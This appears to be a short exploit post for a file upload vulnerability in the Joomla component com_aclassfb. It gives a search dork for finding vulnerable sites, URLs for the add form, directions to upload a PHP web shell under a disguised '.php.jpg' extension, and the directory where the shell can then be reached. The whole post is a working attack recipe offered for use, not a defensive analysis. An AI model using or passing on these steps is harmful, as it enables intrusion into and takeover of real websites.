Vuln:Joomla com_aclassfb file upload vulnerability
Vendor:http://www.almondsoft.com
Type:PHP
Tested:
1)Browser:Mozilla,Chrome,Opera
2)System:Windows,Linux
Dork:inurl:com_aclassfb
Exploit:
1)http://test.com/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
2)http://test.com/index.php?option=com_aclassfb and click=>"Post New Add"
Upload your shell(extension):
.php .php.jpg / etc
Shell access:
http://test.com/component/com_aclassfb/photos/
and find your shell...